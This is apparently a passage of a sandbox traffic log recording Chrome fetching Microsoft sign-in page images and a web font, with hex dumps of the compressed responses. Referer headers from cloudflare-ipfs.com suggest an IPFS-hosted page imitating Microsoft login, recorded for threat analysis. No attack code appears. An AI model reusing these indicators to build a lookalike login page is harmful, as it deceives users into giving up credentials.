2024-04-16 09:44:00 UTC	199	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00 Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	49710	13.107.213.40	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:00 UTC	656	OUT	GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cloudflare-ipfs.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:00 UTC	805	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:44:00 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:46 GMT ETag: 0x8DB5C3F47E260FD x-ms-request-id: b5112e21-101e-0007-7534-8f3490000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240416T094400Z-18655757dbc257tlu6s8d6mu2w00000003e0000000006v3d x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-16 09:44:00 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49719	104.17.24.14	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:01 UTC	656	OUT	GET /ajax/libs/font-awesome/6.1.1/webfonts/fa-solid-900.woff2 HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://cloudflare-ipfs.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:01 UTC	979	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:44:01 GMT Content-Type: application/octet-stream; charset=utf-8 Content-Length: 154228 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: "623a082a-25a74" Last-Modified: Tue, 22 Mar 2022 17:32:26 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 375811 Expires: Sun, 06 Apr 2025 09:44:01 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6QSlrPvaO%2FYEKaYAVHB2MYRfipLdF3p7tNHN%2FVlNVwEgxGub%2FIAl5nTlFK9fw1WVTDjgafnlelggJeFBEZuEDeXS%2FD0Ppm0morpYuWlUjtGfDRTVKyDPKDlPxq08dmLSVevDgpEp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 87533c00ddd6071d-ATL alt-svc: h3=":443"; ma=86400
2024-04-16 09:44:01 UTC	390	IN	Data Raw: 77 4f 46 32 00 01 00 00 00 02 5a 74 00 0a 00 00 00 05 a0 28 00 02 5a 29 03 01 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 38 02 24 04 20 06 60 03 ab 28 00 81 8f 40 ca 94 d0 28 cb ab 2c 05 87 70 07 20 a5 13 d0 92 94 01 48 70 1e 00 00 b6 ea e7 61 44 8a 66 0f 4f 11 b0 71 00 00 e8 9a 07 40 55 55 55 55 d5 a4 84 80 c7 6c db 01 a8 aa aa e0 47 3f f9 d9 2f 7e f5 9b df fd e1 4f 7f f9 9b bf fb 87 7f fa 97 7f fb 8f ff fa 9f ff fb 4f 81 c1 b8 fb 07 c2 b4 6c c7 e5 f6 78 7d 7e c3 7f b5 df e7 b9 3d ef 03 ed 4e 88 27 c0 8e b8 a3 c2 0a 88 ca 47 75 40 af 8c 70 31 86 47 a8 08 19 e3 d6 66 2c cc a5 2a 10 cb 56 3c 5b 00 c4 57 08 e1 55 a6 57 23 f9 e4 02 90 13 e0 40 9e 82 ab ed f0 22 5b c9 44 f4 38 98 89 ca 8b 0b 4c b4 ed 37 49 a7 07 f5 bc 7f e0 4f a4 7b Data Ascii: wOF2Zt(Z)8$ `(@(,p HpaDfOq@UUUUlG?/~OOlx}~=N'Gu@p1Gf,*V<[WUW#@"[D8L7IO{
2024-04-16 09:44:01 UTC	1369	IN	Data Raw: 57 bd 86 d7 af fb 41 37 0f ec 60 ef 74 2f 49 3b b0 33 2d 4b 96 76 64 4b b1 ec 18 d6 44 d1 84 6d 85 64 73 d0 e3 f8 12 db 41 85 d0 1b 62 85 d0 e3 23 d4 3f 1f c1 da 47 e4 4f ce 6d 2e 99 3d 9e ac 9c ff ea 75 78 fd 3a bc d7 9d 67 72 cf f4 cc f4 cc a6 09 bd 33 bd e1 f6 76 2e af 74 0a 7b a7 70 a7 78 a3 90 40 48 0b 02 24 04 42 23 a2 48 d6 01 06 04 18 34 72 42 02 3e 9c 13 c6 09 8d b0 fd 1d d2 19 27 1c b5 38 e2 84 0f 07 c0 81 be 9f 70 6a fd 3c d1 68 34 1a a1 67 e4 d8 71 2c 59 b6 e4 c4 4e 62 5b b6 95 b0 bb c0 6d 73 c4 5e 4c f7 30 dd ed 02 5d 7d c7 dd a3 dc c7 7e f6 27 ce 11 fb 13 77 3f 61 3e 10 39 3f cf cf d4 fe 9d 0b f4 de bb 0f 48 c0 4f d2 93 66 46 23 69 34 92 c6 9e 19 8f 4c b1 1d 3b 89 9d 34 71 a8 c9 04 37 61 a7 6d c2 6d a6 94 c2 52 da 85 94 33 05 5c f2 76 81 9b Data Ascii: WA7`t/I;3-KvdKDmdsAb#?GOm.=ux:gr3v.t{px@H$B#H4rB>'8pj<h4gq,YNb[ms^L0]}~'w?a>9?HOfF#i4L;4q7ammR3\v
2024-04-16 09:44:01 UTC	1369	IN	Data Raw: 3a f3 fc ca e2 c9 d5 dc 28 56 bd 3c 5b 33 aa d5 ba 94 f6 2e ee 34 2a b9 77 b9 b3 5a 57 25 53 ec 90 d4 76 29 0c 73 a9 ca b3 f3 ce 2a f9 34 68 fc b5 0c c4 93 18 1b 5a ea 47 27 ab ee 6c 63 c7 de 95 cd d9 89 a9 b2 9c 94 b3 81 9c 37 02 76 4f 35 e6 30 1a 3f 8e 51 e4 82 f7 af cb 01 83 c5 bd f7 2b d5 de 34 ec 6e db 43 05 a3 d1 dd f9 d0 e1 f0 3c d1 6f 44 91 bb ce 26 2d 6d 95 c7 cb 14 89 03 c1 d3 81 8c 7a a0 87 c5 b8 72 f3 7b d4 c8 5c c8 b8 21 ef 3b 87 d5 ea a2 75 94 58 8a f8 e7 29 de 8b f6 d2 79 90 a8 66 dd 3a 30 18 d6 a0 2b 9d 21 cf e1 eb 90 7f ba b8 7d 1c 45 f1 36 22 b7 e9 90 d5 2e 9d 8f 32 bf c3 fa ca 67 ab 18 d4 cb 91 bd ed fa b4 f4 07 cc 93 b5 22 a7 2d ae 05 87 f4 1d df c6 63 19 97 f8 48 c7 a8 bf d3 90 65 e2 c9 9c 8d 6f cd 06 0f f7 90 38 b0 73 ef 5f 14 cc 5b Data Ascii: :(V<[3.4wZW%Sv)s4hZG'lc7vO50?Q+4nC<oD&-mzr{\!;uX)yf:0+!}E6".2g"-cHeo8s_[
2024-04-16 09:44:01 UTC	1369	IN	Data Raw: 23 33 1a a3 33 26 63 31 21 13 31 31 93 33 05 d3 30 2d d3 31 3d 33 33 17 f3 b3 30 4b b3 0c 2b b3 26 6b b1 1e 1b b3 15 fb 72 04 c7 72 32 a7 72 06 67 71 36 e7 70 1e 17 71 33 b7 72 1b 77 f0 00 cf f1 32 ef f2 1e ef f3 01 1f f3 35 3f f2 1b bf f3 27 7f f1 9f 02 15 46 11 94 58 99 94 5b f9 54 4e e5 55 59 55 d5 48 1d d5 47 7d d5 5f 03 34 42 13 34 51 93 34 59 d3 34 5d b3 34 5f 0b b5 58 2b b5 56 bb b5 47 fb b4 5f 07 74 50 87 74 58 47 75 5c 27 74 59 37 74 53 0f f5 4a 6f f4 5e 9f 24 7d d3 4f fd b3 50 16 d1 12 5a 62 4b 6b d9 2d af 35 b0 46 d6 d4 5a d8 30 1b 6e 63 6c aa ad b2 23 76 cc 4e d9 39 bb 62 d7 ec 91 3d b5 57 f6 c9 7e db 5f fb ef a1 3d aa 27 f7 94 9e d3 73 7b 7e 2f e8 45 bc 98 97 f0 52 5e c6 2b 78 65 af ea 35 bc ae 37 f2 26 de dc 5b 7b 27 ef ee 3d bd 9f 0f f2 21 Data Ascii: #33&c1!1130-1=330K+&krr2rgq6pq3rw25?'FX[TNUYUHG}_4B4Q4Y4]4_X+VG_tPtXGu\'tY7tSJo^$}OPZbKk-5FZ0ncl#vN9b=W~_='s{~/ER^+xe57&[{'=!
2024-04-16 09:44:01 UTC	1369	IN	Data Raw: c0 4d c1 4d dc d8 8d dc c0 f5 c1 f5 5c 17 5c c7 b5 5d cb 65 2c c7 1c fc 96 f3 39 2f 38 8f 73 3b a7 fe d1 5f d0 1f fd d0 17 7d d4 0b d0 73 d0 33 3d d5 23 3d 04 3d 00 dd d7 3d dd d1 2d 5d d1 25 9d d5 19 1d 03 1d 06 1d d4 01 ed 01 ed 06 d0 66 d0 26 d0 06 00 ad 00 2d d3 52 2d d6 0c d0 34 d0 54 d0 94 be ff b5 ef 44 d0 58 8d 01 0d d5 10 0d d6 40 f5 57 1f f5 52 0f 75 51 47 b5 53 7d d5 53 55 50 89 f8 37 fe 89 3f f1 1b 20 1e c6 cd 38 15 fb 63 5f ec 8e 1d b1 35 b6 c4 c6 58 1f ab 63 49 cc 80 98 1a e3 63 58 f4 89 de d1 2e da 46 eb 68 15 2d a2 79 34 8b a6 d1 24 1a 46 fd a8 17 75 a2 46 54 8d 2a 51 39 2a 44 f9 c8 a2 6c 94 86 28 1e c5 a2 68 44 a4 28 12 85 23 2f a4 ff d3 9f f4 23 7d 4b 5f d3 97 f4 39 bd 4d 2f d3 f3 f4 34 3d 86 74 35 9d 87 74 0e d2 59 48 67 20 9d 4e a7 d2 Data Ascii: MM\\]e,9/8s;_}s3=#===-]%f&-R-4TDX@WRuQGS}SUP7? 8c_5XcIcX.Fh-y4$FuFTQ9Dl(hD(#/#}K_9M/4=t5tYHg N
2024-04-16 09:44:01 UTC	1369	IN	Data Raw: d0 88 a2 00 0d f3 01 c0 7e 05 32 40 06 10 20 01 72 80 02 75 80 ba 40 00 1a 01 ad 81 02 40 3b 60 0c 50 0a 98 0c 4c 06 ca 03 53 80 29 40 05 60 2a 30 15 a8 08 4c 03 a6 01 95 80 e9 c0 74 a0 32 30 03 98 01 54 01 66 f2 b7 a8 0a cc 2a aa 01 b3 8b ea c0 9c a2 06 30 b7 88 81 79 45 06 98 5f 64 81 05 45 02 2c 2c f2 80 45 45 0e 58 5c a4 c0 92 a2 26 b0 b4 a8 05 2c 2b 6a 03 cb 8b 3a c0 8a a2 2e b0 b2 a8 07 ac 2a ea 03 ab 8b 06 c0 9a 83 1a 02 17 43 37 02 97 42 37 03 57 42 9f 00 ae 86 76 02 ae 83 15 04 6e 83 de 05 dc 0d ed 0c bc 0e d9 07 fc 0e fb 08 e2 32 90 d7 21 ae 0a ed 0b 71 35 68 3f 88 5b 43 bb 41 dc 06 da 1d e2 4b a0 67 20 be 02 ba 09 e2 2b a1 5b 21 be 0a fa 0a c4 d7 40 37 40 7c 0b fc 3d 88 ef 40 68 04 f1 bd d0 2d 90 c9 c2 0a 40 e6 20 e4 05 c8 1c 82 bc 04 99 c3 90 Data Ascii: ~2@ ru@@;`PLS)@`0Lt20Tf0yE_dE,,EEX\&,+j:.*C7B7WBvn2!q5h?[CAKg +[!@7@\|=@h-@
2024-04-16 09:44:01 UTC	1369	IN	Data Raw: e5 c8 65 c9 15 68 0f 93 2b 0a 71 28 b9 52 66 1c 44 ae 4c ae 45 7b 9c 5c 87 dc bc ad d9 e4 16 a0 3d 47 6e 89 f6 3c b9 55 4f 7b 99 dc 86 dc a9 bd de e4 ce c0 20 72 17 b4 b7 c9 5d 27 34 90 dc 8d dc 8b f6 0e b9 0f 79 14 ed 43 f2 18 65 b4 ef c9 e3 c9 93 68 3f 90 27 0b 71 06 79 0a e2 4c f2 54 b4 22 4f 33 b6 09 a7 f3 33 b6 9f c9 33 c9 b3 68 bf 90 e7 90 e7 d2 7e 23 cf 27 2f a4 fd 41 5e 24 c4 c4 e4 c5 68 37 91 97 4c d8 fe 26 af 20 af a2 fd 43 5e 43 5e 4b fb 9f bc 4e 3d b1 30 79 3d 79 d7 f5 7d db 21 ef 21 ef 23 46 90 cf 90 2f 11 a3 c9 57 c8 57 89 a9 c8 b7 c8 8f 88 69 c8 4f 30 7e 76 db 67 e4 e7 fb 2a 4d 7e d1 61 c0 79 64 8f f6 19 f9 65 4f 4b f2 2b f2 c7 36 d6 56 32 c9 5f 89 05 c8 df 40 b7 08 f9 3b e2 44 f2 8f cc b8 8e fc 93 fc 9f 58 94 42 0d de cf 6c 6a 08 19 dd 26 Data Ascii: eh+q(RfDLE{\=Gn<UO{ r]'4yCeh?'qyLT"O333h~#'/A^$h7L& C^C^KN=0y=y}!!#F/WWiO0~vg*M~aydeOK+6V2_@;DXBlj&
2024-04-16 09:44:01 UTC	1369	IN	Data Raw: 1c d9 85 f6 02 ed 15 b2 37 ed 35 da eb e4 00 da 9b b4 b7 c9 41 b4 0f 48 e4 50 da c7 22 87 d1 3e f5 c8 e1 b4 cf 69 5f 90 23 68 5f 49 e4 28 da b7 22 47 d3 7e 10 39 86 f6 8b c8 b1 b4 df 3d 72 1c ed 3f b4 ff 92 e3 a9 61 24 72 22 15 91 93 a8 31 45 4e a6 c6 11 39 85 9a 48 e4 54 6a 0a 91 d3 a8 a9 36 62 4e a7 a6 a5 a6 23 67 50 33 51 33 93 b3 a8 d9 a9 39 c9 39 d4 02 f2 c8 f9 d4 22 d4 a2 e4 02 6a 29 89 5c 44 2d 2b 72 31 b5 82 c8 25 d4 ca 22 97 52 6b 88 5c 46 ad e5 91 cb a9 75 a8 f5 c8 15 d4 86 f2 c8 d5 d4 66 d4 e6 e4 1a 6a 6b e5 cc 75 d4 b6 d4 f6 e4 7a 6a 27 6a 17 72 13 b5 9b 44 6e a5 f6 10 b9 8d da 57 e4 76 6a ff 9c b9 83 3a 90 3a 88 dc 49 1d 42 1d 4a ee a6 8e 50 ce dc 4b 1d 45 1d 4b ee a3 4e a0 4e 22 0f 51 e7 2b 67 1e a5 2e a4 2e 21 8f 51 57 52 57 91 a7 a8 1b 24 Data Ascii: 75AHP">i_#h_I("G~9=r?a$r"1EN9HTj6bN#gP3Q399"j)\D-+r1%"Rk\Fufjkuzj'jrDnWvj::IBJPKEKNN"Q+g..!QWRW$
2024-04-16 09:44:01 UTC	1369	IN	Data Raw: 91 78 04 ca bf 90 f0 38 ca bf 92 b8 09 ca 85 e8 54 94 7f 27 fa 11 e5 bf 2b 54 5b 1d fa 6f 25 07 f4 29 72 41 e2 72 e4 46 e2 58 e4 b5 88 2e 46 5e 87 e8 12 e4 75 49 f8 05 79 3d 12 1e 43 5e 9f e8 08 e4 8d 89 7e 42 de 84 e8 7c e4 4d 89 fe 46 de 8c 84 91 c8 9b 93 f0 14 f2 16 44 57 21 6f 49 42 23 e4 ad 48 38 17 79 77 a2 f7 91 f7 24 a1 0e f2 5e c4 de 46 de 8f d8 71 c8 87 91 b0 00 f9 70 0b 6e 26 c4 2e 41 3e 9b d8 ad c8 e7 90 78 2d f2 b9 c4 ae 47 3e 8f d8 2d c8 e7 13 7b 04 f9 02 62 ef 20 5f 4a 74 06 f2 ed d5 7e 89 ef 84 fa 47 e2 bb 42 ec 2b e4 7b 92 f0 2e f2 bd 89 7d 83 7c 7f f5 95 c4 0f 84 54 2b 91 1f 46 42 6f e4 c7 a8 bf 26 7e 1c 24 4e 45 7e 3c b1 75 c8 4f 20 e1 39 e4 67 92 6a 32 f2 b3 48 34 e4 57 68 99 4f fc 4a 48 5c 85 fc 1a a2 ab 91 5f 4b c2 93 c8 af d3 32 99 Data Ascii: x8T'+T[o%)rArFX.F^uIy=C^~B\|MFDW!oIB#H8yw$^Fqpn&.A>x-G>-{b _Jt~GB+{.}\|T+FBo&~$NE~<uO 9gj2H4WhOJH\_K2
2024-04-16 09:44:01 UTC	1369	IN	Data Raw: 4a c2 58 72 d3 f4 fc 72 58 32 f9 3e 8d 61 b9 12 71 43 37 4c 87 73 2f 8e dc 5e b5 3c cc 4e f3 83 72 18 33 26 71 c6 98 5c 24 9a 46 74 c7 11 82 9a 1a 21 84 50 6e fb ca 30 2d c9 d1 60 16 97 95 6a a3 16 84 b6 a5 b5 56 fb 17 4a 11 35 4a 99 c9 b9 e0 86 6e 50 d3 d4 4c 6e fb ae 61 52 f5 93 d5 ac 05 01 b3 48 2a 19 bb 1e a3 0e 00 a7 38 f5 e3 d9 15 00 98 a5 bd 36 45 d3 71 f3 e0 68 b8 91 1b a3 a2 37 2a b2 3c cb 4d 6a d2 38 89 13 c3 a4 bd 58 69 54 e4 7e 2e bc cf 16 c2 9e cf 18 b3 85 b0 71 cc d8 fc b7 aa be 8f e8 fb d5 cf bb 46 48 dd 0b f7 31 36 9f d9 42 d8 8c e1 d8 16 c2 be af 97 67 ad fa 3e 4e df f7 08 20 94 f7 76 f0 33 b8 0d e7 03 74 cc b4 bd 8e 76 35 fb 56 8b d1 26 9a 6f 46 12 37 f0 d6 d5 4f e2 1a 5a 7a 06 35 15 3a 45 7e fc 84 ed 5b d6 3d 8c 09 61 db f7 5a 96 6f 9b Data Ascii: JXrrX2>aqC7Ls/^<Nr3&q\$Ft!Pn0-`jVJ5JnPLnaRH86Eqh7<Mj8XiT~.qFH16Bg>N v3tv5V&oF7OZz5:E~[=aZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49722	13.107.246.41	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:01 UTC	418	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:01 UTC	785	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:44:01 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:48 GMT ETag: 0x8DB5C3F4911527F x-ms-request-id: bd254fe0-e01e-003c-0538-8f3096000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240416T094401Z-18655757dbcrzwhputx21vz6p4000000039g000000005vfn x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-04-16 09:44:01 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49720	152.199.4.44	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:01 UTC	424	OUT	GET /shared/1.0/content/images/picker_verify_code_b41922ebdaebec16b19999fc6054a15a.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:01 UTC	737	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 4309725 Cache-Control: public, max-age=31536000 Content-MD5: 1jQlecEJaGhFO2st5KXLhg== Content-Type: image/svg+xml Date: Tue, 16 Apr 2024 09:44:01 GMT Etag: 0x8DB5C3F4AC59B47 Last-Modified: Wed, 24 May 2023 10:11:51 GMT Server: ECAcc (agc/7F54) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 7e961d5b-a01e-006d-2fb0-68c71f000000 x-ms-version: 2009-09-19 Content-Length: 1636 Connection: close
2024-04-16 09:44:01 UTC	1636	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 38 2c 31 34 48 31 30 56 33 34 48 33 38 56 31 34 6d 32 2c 32 32 48 38 56 31 32 48 34 30 56 33 36 4d 31 37 2e 36 38 38 2c 31 38 2e 38 56 32 38 2e 38 32 38 48 31 35 2e 35 33 31 56 32 31 2e 32 33 34 61 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2d 2e 36 37 32 2e 34 33 6c 2d 2e 32 36 36 2e 31 31 37 61 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M38,14H10V34H38V14m2,22H8V12H40V36M17.688,18.8V28.828H15.531V21.234a3.2,3.2,0,0,1-.672.43l-.266.117a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49721	13.107.246.41	443	3092	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-16 09:44:01 UTC	417	OUT	GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-16 09:44:01 UTC	784	IN	HTTP/1.1 200 OK Date: Tue, 16 Apr 2024 09:44:01 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 24 May 2023 10:11:46 GMT ETag: 0x8DB5C3F47E260FD x-ms-request-id: b5112e21-101e-0007-7534-8f3490000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240416T094401Z-18655757dbc4drptmmrr5wasz800000003mg000000002smz x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
